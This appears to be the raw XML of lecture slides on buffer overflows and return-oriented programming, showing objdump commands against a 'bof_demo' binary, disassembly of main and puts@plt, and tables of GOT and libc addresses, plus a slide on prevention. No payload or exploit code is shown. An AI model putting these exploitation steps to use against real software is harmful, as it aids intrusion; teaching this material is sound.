                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>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295822" y="2499246"/>
            <a:ext cx="9597889" cy="925667"/>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r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;main&gt;:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  *0x2ea2(%rip)   # 403ff0 &lt;__libc_start_main@GLIBC_2.2.5&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFAF50C6-DE0E-A6D2-8AC0-BBB057822159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299634" y="3667253"/>
            <a:ext cx="9601195" cy="741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sz="3200"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9A9547-F578-08F3-F554-893B1A4A1350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295821" y="4561963"/>
            <a:ext cx="9606548" cy="559452"/>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r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle: Rounded Corners 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D43F64-CDA0-0E0A-CC4C-11C817DA1E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294534" y="5113192"/>
            <a:ext cx="9594271" cy="9178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rgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jmpq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> *0x2f9d(%rip)        # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>404018 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="86724D"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>&lt;puts@GLIBC_2.2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  401070 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404823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5" cy="741765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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295822" y="2499246"/>
            <a:ext cx="9597889" cy="925667"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFAF50C6-DE0E-A6D2-8AC0-BBB057822159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299634" y="3667253"/>
            <a:ext cx="9601195" cy="741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SzPct val="114999"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle: Rounded Corners 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D3E2B3-59A4-F0FD-4DC9-64B2C83B721B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295821" y="4561963"/>
            <a:ext cx="9606548" cy="559452"/>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endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle: Rounded Corners 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42D60F67-D7D7-E782-E269-CE2114E8D419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294534" y="5113192"/>
            <a:ext cx="9594271" cy="917863"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                                                      # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>404018 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386730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200511162"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8865472" y="658998"/>
          <a:ext cx="2630109" cy="54864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0x404018</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535350060"/>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2711412801"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5342752" y="4707380"/>
          <a:ext cx="3371404" cy="1584960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1075028">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3557023095"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2296376">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0x401273</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31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1DC12F-0A8C-BFFC-F9E9-B98EC94ED349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5656683" y="3114091"/>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Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D7A079-5350-3EF7-82DE-71502ECBEEBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="6905544"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18" name="Rectangle: Rounded Corners 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26764584-2ACD-CDAE-698F-7CEC5BF35157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157776" y="3884700"/>
            <a:ext cx="2999662" cy="925667"/>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endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle: Rounded Corners 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC811DD-8D68-5A05-1094-DED3D017E1A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462519" y="3252113"/>
            <a:ext cx="2774526" cy="542134"/>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endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle: Rounded Corners 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7C0C66-E9AB-5556-0555-5A60B80642EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1701511" y="2827192"/>
            <a:ext cx="9594271" cy="917863"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                                                      # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>404018 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266804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755629921"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8865472" y="705650"/>
          <a:ext cx="2630109" cy="54864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0x404018</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535350060"/>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1736293727"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5412025" y="4664084"/>
          <a:ext cx="3254495" cy="1584960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1037749">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3557023095"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2216746">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0x401273</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505175" y="3886792"/>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9E5CA092-022C-AA71-30C3-38496AEEDA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="6932125"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3" name="Arrow: Up 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B7A162-E90A-99BE-AA77-89C99062F120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="799643" y="262715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1826489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1517828859"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8826595" y="1312140"/>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2370334810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5753794" y="4652598"/>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0x401274</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92658" y="388603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AD4AB0F8-ED36-7966-6CCE-4F506E7A813B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="6958706"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3" name="Arrow: Up 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FD2C6A-1E4B-9E30-6CBC-C49BAE2D9123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="740474" y="296852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264566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Overview</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t>Why is Buffer Overflow relevant?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>What is Buffer Overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>What is Return Object Programming (ROP)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>How to prevent BOF exploits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1355495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560872775"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8834371" y="1249936"/>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3969887400"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5746018" y="4637046"/>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0x401070</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94555" y="3295474"/>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69ACCFFF-74BF-E562-4366-C317626F6690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063477" y="1617834"/>
            <a:ext cx="6976426"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5" name="Arrow: Up 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{166F8A23-6EA7-6358-124B-837551B1A0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="794903" y="337284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4" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B8718B-5EAA-4681-11B7-533E639681CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607174" y="5087195"/>
            <a:ext cx="5487190"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21548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0x7f365d1a9420</a:t>
            </a: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3137346324"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8803268" y="1164406"/>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3820872201"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5668263" y="4683700"/>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0x401070</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40125" y="2622418"/>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9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FE4EA9-7ED7-F326-BC95-E93EC706F18E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607174" y="5087195"/>
            <a:ext cx="5487190"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B49BF41-3412-E6BB-0040-70254CC94368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="7020729"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5" name="Arrow: Up 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E48FF074-BDF1-2E90-C5A4-17A3CB13D220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="740474" y="3691645"/>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150710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0x7f365d1a9420</a:t>
            </a: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3136130330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8849921" y="1242161"/>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1104648167"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5442857" y="4665306"/>
